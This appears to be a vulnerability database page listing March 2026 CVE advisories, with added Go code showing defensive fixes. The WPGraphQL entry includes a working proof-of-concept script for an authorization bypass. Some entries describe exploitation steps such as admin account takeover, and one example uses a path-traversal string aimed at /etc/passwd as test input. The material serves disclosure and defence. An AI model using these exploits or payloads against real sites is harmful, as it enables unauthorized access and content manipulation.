Vulnerabilities

To inform, warn and assist professionals about the latest security vulnerabilities in technology systems, we have made available to interested users a Spanish-language database that includes the latest documented and recognised vulnerabilities.

This repository, with over 75,000 records, is based on the information in the NVD (National Vulnerability Database), which INCIBE translates into Spanish under a partnership agreement.

Occasionally the list will show vulnerabilities that have not yet been translated, since entries are added while the INCIBE team is still translating them. The CVE (Common Vulnerabilities and Exposures) standard for naming information security vulnerabilities is used so that information can be exchanged between different tools and databases.

Every vulnerability collected is linked to its information sources and to the patches or solutions made available by manufacturers and developers. Advanced searches are possible: results can be narrowed down by criteria such as vulnerability type, manufacturer and impact level, among others.

RSS feeds and newsletters provide daily notification of the latest vulnerabilities added to the repository. Below is a list, updated daily, of the latest vulnerabilities.

CVE-2026-4673

Publication date:
24/03/2026
Heap buffer overflow in WebAudio in Google Chrome prior to 146.0.7680.165 allowed a remote attacker to perform an out of bounds memory write via a crafted HTML page. (Chromium security severity: High)
Severity CVSS v4.0: Pending analysis
Last modification:
24/03/2026

CVE-2026-33320

Publication date:
24/03/2026
Dasel is a command-line tool and library for querying, modifying, and transforming data structures. Starting in version 3.0.0 and prior to version 3.3.1, Dasel's YAML reader allows an attacker who can supply YAML for processing to trigger extreme CPU and memory consumption. The issue is in the library's own `UnmarshalYAML` implementation, which manually resolves alias nodes by recursively following `yaml.Node.Alias` pointers without any expansion budget, bypassing go-yaml v4's built-in alias expansion limit. Version 3.3.2 contains a patch for the issue.
Severity CVSS v4.0: Pending analysis
Last modification:
25/03/2026
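
The Dasel entry above describes a pattern worth recognising in any decoder that walks a parsed node graph itself: the parser may cap alias expansion, but a custom `UnmarshalYAML` that follows alias pointers recursively sidesteps that cap unless it carries its own budget. The following Go program is an added example, not Dasel or go-yaml code. It models a parsed document with a hypothetical `Node` type (scalar, sequence, alias), builds the classic exponential "billion laughs" alias structure as constructed input, and shows a resolver that charges every visited node against a fixed budget so both exponential expansion and a self-referential anchor terminate with an error instead of exhausting memory.

```go
package main

import (
	"errors"
	"fmt"
)

// Kind distinguishes the node shapes the walk has to handle. Mappings are
// omitted; they would be treated exactly like Sequence.
type Kind int

const (
	Scalar Kind = iota
	Sequence
	Alias
)

// Node is a toy stand-in for a parsed yaml.Node (hypothetical type, not the
// go-yaml one): a scalar, a sequence of children, or an alias that points at
// an anchored node elsewhere in the same document.
type Node struct {
	Kind     Kind
	Value    string
	Children []*Node
	Alias    *Node // target of an alias node; nil for other kinds
}

// ErrAliasBudget is returned when materialising the document would exceed the budget.
var ErrAliasBudget = errors.New("yaml: alias expansion exceeds budget")

// Resolver expands aliases while charging every node it visits against a
// fixed budget, so a small document whose aliases expand exponentially, or a
// self-referential anchor, is rejected instead of exhausting CPU and memory.
type Resolver struct {
	Budget  int // maximum number of nodes the walk may visit
	visited int
	scalars int
}

// Expand returns a materialised copy of n with every alias replaced by its
// target. The vulnerable pattern is this same walk without the budget check:
// following n.Alias recursively bypasses any limit the parser itself applies.
func (r *Resolver) Expand(n *Node) (*Node, error) {
	r.visited++
	if r.visited > r.Budget {
		return nil, ErrAliasBudget
	}
	switch n.Kind {
	case Alias:
		if n.Alias == nil {
			return nil, errors.New("yaml: alias without target")
		}
		return r.Expand(n.Alias)
	case Scalar:
		r.scalars++
		return &Node{Kind: Scalar, Value: n.Value}, nil
	default: // Sequence
		out := &Node{Kind: Sequence}
		for _, c := range n.Children {
			ec, err := r.Expand(c)
			if err != nil {
				return nil, err
			}
			out.Children = append(out.Children, ec)
		}
		return out, nil
	}
}

// ExpandWithBudget is what an UnmarshalYAML implementation would call. It
// returns the number of scalars the expanded document contains, or ErrAliasBudget.
func ExpandWithBudget(doc *Node, budget int) (int, error) {
	r := &Resolver{Budget: budget}
	if _, err := r.Expand(doc); err != nil {
		return 0, err
	}
	return r.scalars, nil
}

// BuildAliasBomb constructs the "billion laughs" shape as a node graph: level i
// is a sequence of fanout aliases to level i-1, so a document holding only
// depth*fanout nodes expands to fanout^depth scalars. Constructed test input.
func BuildAliasBomb(depth, fanout int) *Node {
	cur := &Node{Kind: Scalar, Value: "x"}
	for i := 0; i < depth; i++ {
		seq := &Node{Kind: Sequence}
		for j := 0; j < fanout; j++ {
			seq.Children = append(seq.Children, &Node{Kind: Alias, Alias: cur})
		}
		cur = seq
	}
	return cur
}

func main() {
	n, err := ExpandWithBudget(BuildAliasBomb(3, 4), 1000)
	fmt.Println(n, err) // 64 <nil>
	_, err = ExpandWithBudget(BuildAliasBomb(20, 10), 100000)
	fmt.Println(err) // yaml: alias expansion exceeds budget
}
```

The budget is charged per visited node rather than per produced scalar so that an alias cycle with no leaves (`&a [*a]`) also terminates; a real implementation would size the budget relative to the input length, since legitimate documents rarely expand more than a small constant factor.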

CVE-2026-33290

Publication date:
24/03/2026
WPGraphQL provides a GraphQL API for WordPress sites. Prior to version 2.10.0, an authorization flaw in updateComment allows an authenticated low-privileged user (including a custom role with zero capabilities) to change moderation status of their own comment (for example to APPROVE) without the moderate_comments capability. This can bypass moderation workflows and let untrusted users self-approve content. Version 2.10.0 contains a patch.

### Details

In WPGraphQL 2.9.1 (tested), authorization for updateComment is owner-based, not field-based:

- plugins/wp-graphql/src/Mutation/CommentUpdate.php:92 allows moderators.
- plugins/wp-graphql/src/Mutation/CommentUpdate.php:99:99 also allows the comment owner, even if they lack moderation capability.
- plugins/wp-graphql/src/Data/CommentMutation.php:94:94 maps GraphQL input status directly to WordPress comment_approved.
- plugins/wp-graphql/src/Mutation/CommentUpdate.php:120:120 persists that value via wp_update_comment.
- plugins/wp-graphql/src/Type/Enum/CommentStatusEnum.php:22:22 exposes moderation states (APPROVE, HOLD, SPAM, TRASH).

This means a non-moderator owner can submit status during update and transition moderation state.

### PoC

Tested in local wp-env (Docker) with WPGraphQL 2.9.1.

1. Start environment:

npm install
npm run wp-env start

2. Run this PoC:

```
npm run wp-env run cli -- wp eval '
add_role("no_caps","No Caps",[]);
$user_id = username_exists("poc_nocaps");
if ( ! $user_id ) {
    $user_id = wp_create_user("poc_nocaps","Passw0rd!","poc_nocaps@example.com");
}
$user = get_user_by("id",$user_id);
$user->set_role("no_caps");

$post_id = wp_insert_post([
    "post_title" => "PoC post",
    "post_status" => "publish",
    "post_type" => "post",
    "comment_status" => "open",
]);

$comment_id = wp_insert_comment([
    "comment_post_ID" => $post_id,
    "comment_content" => "pending comment",
    "user_id" => $user_id,
    "comment_author" => $user->display_name,
    "comment_author_email" => $user->user_email,
    "comment_approved" => "0",
]);

wp_set_current_user($user_id);

$result = graphql([
    "query" => "mutation U(\$id:ID!){ updateComment(input:{id:\$id,status:APPROVE}){ success comment{ databaseId status } } }",
    "variables" => [ "id" => (string)$comment_id ],
]);

echo wp_json_encode([
    "role_caps" => array_keys(array_filter((array)$user->allcaps)),
    "status" => $result["data"]["updateComment"]["comment"]["status"] ?? null,
    "db_comment_approved" => get_comment($comment_id)->comment_approved ?? null,
    "comment_id" => $comment_id
]);
'
```

3. Observe result:

- role_caps is empty (or no moderate_comments)
- mutation returns status: APPROVE
- DB value becomes comment_approved = 1

### Impact

This is an authorization bypass / broken access control issue in comment moderation state transitions. Any deployment using WPGraphQL comment mutations where low-privileged users can make comments is impacted. Moderation policy can be bypassed by self-approving content.
Severity CVSS v4.0: Pending analysis
Last modification:
24/03/2026

CVE-2026-33298

Publication date:
24/03/2026
llama.cpp is an inference of several LLM models in C/C++. Prior to b7824, an integer overflow vulnerability in the `ggml_nbytes` function allows an attacker to bypass memory validation by crafting a GGUF file with specific tensor dimensions. This causes `ggml_nbytes` to return a significantly smaller size than required (e.g., 4MB instead of Exabytes), leading to a heap-based buffer overflow when the application subsequently processes the tensor. This vulnerability allows potential Remote Code Execution (RCE) via memory corruption. b7824 contains a fix.
Severity CVSS v4.0: Pending analysis
Last modification:
24/03/2026
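
The llama.cpp entry above is an instance of a general loader bug: a size computed from attacker-controlled header fields wraps around, the small result passes the bounds check, and the later read or copy runs past the allocation. The Go program below is an added example, not ggml or llama.cpp code, and it deliberately simplifies: it treats the tensor byte count as element size times the product of dimensions, whereas ggml's real formula also involves strides and block sizes. What it shows is the check itself: the wrapping multiplication beside the overflow-detecting one (`math/bits.Mul64`), and a per-tensor validation that also confines the data range to the file. The dimensions used are constructed input.

```go
package main

import (
	"errors"
	"fmt"
	"math/bits"
)

// ErrSizeOverflow is returned when the tensor byte count does not fit in uint64.
var ErrSizeOverflow = errors.New("gguf: tensor byte size overflows uint64")

// TensorBytesWrapping models an unchecked size computation: the element size
// and every dimension are multiplied in uint64 and the product silently wraps,
// so a header describing exabytes can come out as a few megabytes.
func TensorBytesWrapping(ne []uint64, elemSize uint64) uint64 {
	n := elemSize
	for _, d := range ne {
		n *= d
	}
	return n
}

// TensorBytesChecked computes the same product with math/bits.Mul64 and fails
// the moment a non-zero high word appears, before any allocation or read.
func TensorBytesChecked(ne []uint64, elemSize uint64) (uint64, error) {
	if elemSize == 0 {
		return 0, errors.New("gguf: element size must be non-zero")
	}
	n := elemSize
	for _, d := range ne {
		hi, lo := bits.Mul64(n, d)
		if hi != 0 {
			return 0, ErrSizeOverflow
		}
		n = lo
	}
	return n, nil
}

// ValidateTensor is the check a loader should run for every tensor in the
// header: the byte count must be computable without overflow and the data
// range [offset, offset+n) must lie inside the file.
func ValidateTensor(ne []uint64, elemSize, offset, fileSize uint64) (uint64, error) {
	n, err := TensorBytesChecked(ne, elemSize)
	if err != nil {
		return 0, err
	}
	if offset > fileSize || n > fileSize-offset {
		return 0, fmt.Errorf("gguf: tensor data (%d bytes at offset %d) exceeds file size %d", n, offset, fileSize)
	}
	return n, nil
}

func main() {
	// Constructed dimensions: 2^32 x (2^32 + 1) one-byte elements is 16 EiB
	// plus 4 GiB, but the wrapping product is exactly 4 GiB.
	ne := []uint64{1 << 32, (1 << 32) + 1}
	fmt.Println(TensorBytesWrapping(ne, 1)) // 4294967296
	_, err := TensorBytesChecked(ne, 1)
	fmt.Println(err) // gguf: tensor byte size overflows uint64
}
```

Note that `offset+n > fileSize` written naively is itself an overflowable expression; the validation above compares `n > fileSize-offset` after checking `offset <= fileSize` so that no intermediate can wrap.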

CVE-2026-22739

Publication date:
24/03/2026
Vulnerability in Spring Cloud when substituting the profile parameter from a request made to the Spring Cloud Config Server configured to the native file system as a backend, because it was possible to access files outside of the configured search directories. This issue affects Spring Cloud: from 3.1.X before 3.1.13, from 4.1.X before 4.1.9, from 4.2.X before 4.2.3, from 4.3.X before 4.3.2, from 5.0.X before 5.0.2.
Severity CVSS v4.0: Pending analysis
Last modification:
24/03/2026
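
The Spring Cloud Config Server entry above is a path-confinement failure: a request parameter is substituted into a file name and the resulting path is not checked against the configured search directories. The Go program below is an added example, not Spring's code and not its actual fix. It assumes a `<searchDir>/<application>-<profile>.<ext>` naming convention for a file-system backend and applies two checks a practitioner would want: the request parameters must be single path segments, and the cleaned result must still lie below the search directory, tested with `filepath.Rel` rather than a string prefix. The paths used are constructed.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

var (
	ErrBadSegment        = errors.New("config: application and profile must be single path segments")
	ErrOutsideSearchPath = errors.New("config: resolved path escapes the search directory")
)

// IsSingleSegment reports whether s can only ever name one file inside a
// directory: no separators, not empty, and not a dot segment.
func IsSingleSegment(s string) bool {
	return s != "" && s != "." && s != ".." && !strings.ContainsAny(s, `/\`)
}

// WithinDir reports whether candidate, after cleaning, lies below base.
// filepath.Rel is used instead of a string prefix test so that
// "/srv/config-other/x.yml" is not mistaken for a child of "/srv/config".
func WithinDir(base, candidate string) bool {
	rel, err := filepath.Rel(filepath.Clean(base), filepath.Clean(candidate))
	if err != nil {
		return false
	}
	return rel != ".." && !strings.HasPrefix(rel, ".."+string(filepath.Separator))
}

// ResolveConfigFile builds "<searchDir>/<application>-<profile>.<ext>", a
// naming convention assumed here for a file-system config backend, and
// refuses to return anything outside searchDir.
func ResolveConfigFile(searchDir, application, profile, ext string) (string, error) {
	if !IsSingleSegment(application) || !IsSingleSegment(profile) {
		return "", ErrBadSegment
	}
	base, err := filepath.Abs(searchDir)
	if err != nil {
		return "", err
	}
	candidate := filepath.Join(base, application+"-"+profile+"."+ext)
	if !WithinDir(base, candidate) { // belt and braces behind the segment check
		return "", ErrOutsideSearchPath
	}
	return candidate, nil
}

func main() {
	for _, profile := range []string{"prod", "/../../etc/passwd"} {
		p, err := ResolveConfigFile("/srv/config", "app", profile, "yml")
		fmt.Printf("%q -> %q %v\n", profile, p, err)
	}
	// Without the segment check the joined path cleans to /srv/etc/passwd.yml,
	// which WithinDir still catches.
	fmt.Println(WithinDir("/srv/config", filepath.Join("/srv/config", "app-/../../etc/passwd.yml"))) // false
}
```

The segment check comes first because `filepath.Join` cleans `..` components: a profile of `../../etc/passwd` glued to the `app-` prefix becomes the harmless directory name `app-..`, while `/../../etc/passwd` does escape, so relying on cleaning alone makes the outcome depend on how the name is assembled.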

CVE-2026-4615

Publication date:
24/03/2026
A vulnerability was identified in SourceCodester Online Catering Reservation 1.0. Impacted is an unknown function of the file /search.php. Such manipulation of the argument rcode leads to sql injection. The attack may be performed from remote. The exploit is publicly available and might be used.
Severity CVSS v4.0: MEDIUM
Last modification:
24/03/2026

CVE-2026-4001

Publication date:
24/03/2026
The Woocommerce Custom Product Addons Pro plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 5.4.1 via the custom pricing formula eval() in the process_custom_formula() function within includes/process/price.php. This is due to insufficient sanitization and validation of user-submitted field values before passing them to PHP's eval() function. The sanitize_values() method strips HTML tags but does not escape single quotes or prevent PHP code injection. This makes it possible for unauthenticated attackers to execute arbitrary code on the server by submitting a crafted value to a WCPA text field configured with custom pricing formula (pricingType: "custom" with {this.value}).
Severity CVSS v4.0: Pending analysis
Last modification:
24/03/2026

CVE-2026-4021

Publication date:
24/03/2026
The Contest Gallery plugin for WordPress is vulnerable to an authentication bypass leading to admin account takeover in all versions up to, and including, 28.1.5. This is due to the email confirmation handler in `users-registry-check-after-email-or-pin-confirmation.php` using the user's email string in a `WHERE ID = %s` clause instead of the numeric user ID, combined with an unauthenticated key-based login endpoint in `ajax-functions-frontend.php`. When the non-default `RegMailOptional=1` setting is enabled, an attacker can register with a crafted email starting with the target user ID (e.g., `1poc@example.test`), trigger the confirmation flow to overwrite the admin's `user_activation_key` via MySQL integer coercion, and then use the `post_cg1l_login_user_by_key` AJAX action to authenticate as the admin without any credentials. This makes it possible for unauthenticated attackers to take over any WordPress administrator account and gain full site control.
Severity CVSS v4.0: Pending analysis
Last modification:
24/03/2026

CVE-2026-4056

Publication date:
24/03/2026
The User Registration & Membership plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the Content Access Rules REST API endpoints in versions 5.0.1 through 5.1.4. This is due to the `check_permissions()` method only checking for `edit_posts` capability instead of an administrator-level capability. This makes it possible for authenticated attackers, with Contributor-level access and above, to list, create, modify, toggle, duplicate, and delete site-wide content restriction rules, potentially exposing restricted content or denying legitimate user access.
Severity CVSS v4.0: Pending analysis
Last modification:
24/03/2026

CVE-2026-4613

Publication date:
24/03/2026
A vulnerability was found in SourceCodester E-Commerce Site 1.0. This vulnerability affects unknown code of the file /products.php. The manipulation of the argument Search results in sql injection. The attack can be executed remotely. The exploit has been made public and could be used.
Severity CVSS v4.0: MEDIUM
Last modification:
24/03/2026

CVE-2026-4614

Publication date:
24/03/2026
A vulnerability was determined in itsourcecode sanitize or validate this input 1.0. This issue affects some unknown processing of the file /admin/subjects.php of the component Parameter Handler. This manipulation of the argument subject_code causes sql injection. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized.
Severity CVSS v4.0: MEDIUM
Last modification:
24/03/2026

CVE-2026-33252

Publication date:
24/03/2026
The Go MCP SDK used Go's standard encoding/json. Prior to version 1.4.1, the Go SDK's Streamable HTTP transport accepted browser-generated cross-site `POST` requests without validating the `Origin` header and without requiring `Content-Type: application/json`. In deployments without Authorization, especially stateless or sessionless configurations, this allows an arbitrary website to send MCP requests to a local server and potentially trigger tool execution. Version 1.4.1 contains a patch for the issue.
Severity CVSS v4.0: Pending analysis
Last modification:
24/03/2026
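
The Go MCP SDK entry above names the two controls whose absence lets a web page drive a local MCP server: an `Origin` allow-list and a strict `Content-Type`. The middleware below is an added example written for this page, not the SDK's transport code. It wraps any HTTP handler, rejects unknown or malformed origins for every method (a GET on a Streamable HTTP endpoint opens the event stream), and requires `application/json` on POST so that a cross-site request is no longer a CORS "simple request" and the browser withholds it pending a preflight the server never grants. The allowed origin `http://localhost:3000` and the attacker request in `main` are constructed.

```go
package main

import (
	"fmt"
	"mime"
	"net/http"
	"net/http/httptest"
	"net/url"
)

// CSRFGuard wraps an MCP (or any JSON-RPC-over-HTTP) handler and rejects the
// browser-originated cross-site requests described above. It is a stand-alone
// middleware, not the Go MCP SDK's own transport code.
type CSRFGuard struct {
	AllowedOrigins map[string]bool // scheme://host[:port] values a browser may call from
	Next           http.Handler
}

// Check returns the HTTP status to reject the request with, or 0 to allow it.
func (g *CSRFGuard) Check(r *http.Request) (int, string) {
	// 1. Origin: browsers attach it to every cross-site request (and send
	//    "null" for sandboxed or opaque contexts); non-browser MCP clients omit
	//    it. An unknown or malformed Origin is rejected for every method.
	if origin := r.Header.Get("Origin"); origin != "" {
		u, err := url.Parse(origin)
		if err != nil || u.Scheme == "" || u.Host == "" ||
			!g.AllowedOrigins[u.Scheme+"://"+u.Host] {
			return http.StatusForbidden, "origin not allowed"
		}
	}
	// 2. Content-Type: application/json on a cross-site POST forces a CORS
	//    preflight, which this server never answers. Without the requirement a
	//    form submission or a text/plain fetch() is delivered as a normal POST.
	if r.Method == http.MethodPost {
		mt, _, err := mime.ParseMediaType(r.Header.Get("Content-Type"))
		if err != nil || mt != "application/json" {
			return http.StatusUnsupportedMediaType, "Content-Type must be application/json"
		}
	}
	return 0, ""
}

// ServeHTTP enforces Check and then hands the request to the real handler.
func (g *CSRFGuard) ServeHTTP(w http.ResponseWriter, r *http.Request) {
	if code, reason := g.Check(r); code != 0 {
		http.Error(w, reason, code)
		return
	}
	g.Next.ServeHTTP(w, r)
}

func main() {
	guard := &CSRFGuard{
		AllowedOrigins: map[string]bool{"http://localhost:3000": true}, // assumed UI origin
		Next: http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
			fmt.Fprintln(w, `{"jsonrpc":"2.0","id":1,"result":{}}`)
		}),
	}
	// Constructed attacker request: a page on another site POSTing text/plain.
	req := httptest.NewRequest(http.MethodPost, "http://localhost:3000/mcp", nil)
	req.Header.Set("Origin", "https://attacker.example")
	req.Header.Set("Content-Type", "text/plain")
	rec := httptest.NewRecorder()
	guard.ServeHTTP(rec, req)
	fmt.Println(rec.Code) // 403
}
```

Requests with no `Origin` header are allowed because command-line MCP clients do not send one; that is safe only in combination with the `Content-Type` requirement, since a browser always attaches `Origin` to a cross-site POST and cannot send `application/json` without the preflight. Binding the listener to loopback and requiring Authorization remain the primary defences; this guard closes the browser path for deployments that run without them.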